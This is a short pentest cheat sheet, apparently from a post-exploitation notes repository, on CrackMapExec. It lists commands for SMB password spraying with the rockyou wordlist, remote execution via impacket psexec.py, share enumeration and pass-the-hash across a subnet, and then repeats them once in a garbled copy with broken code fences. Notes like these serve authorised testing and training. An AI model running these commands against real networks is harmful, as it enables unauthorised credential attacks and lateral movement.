killchain-compendium/Post Exploitation/Windows/CrackMapExec.md

# Crackmapexec

* Dictionary attack against SMB
```sh 
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
* Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```

## Shares

* Check user permissions on shares
``sh
crackmapexec  smb 10.200.x.0/24 -u <user> -p <password> --shares
```

## SMB
* Check user hash on the network via smb
```sh
 crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Crackmapexec`

			`* Dictionary attack against SMB`
			```sh
			`cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt`
			```
			* Use the password with `impacket/examples/psexec.py` in the following way
			```sh
			`psexec.py domain.name/<user>:<password>@<target-IP>`
			```

			`## Shares`

			`* Check user permissions on shares`
			``sh
			`crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares`
			```

			`## SMB`
			`* Check user hash on the network via smb`
			```sh
			`crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>`
			```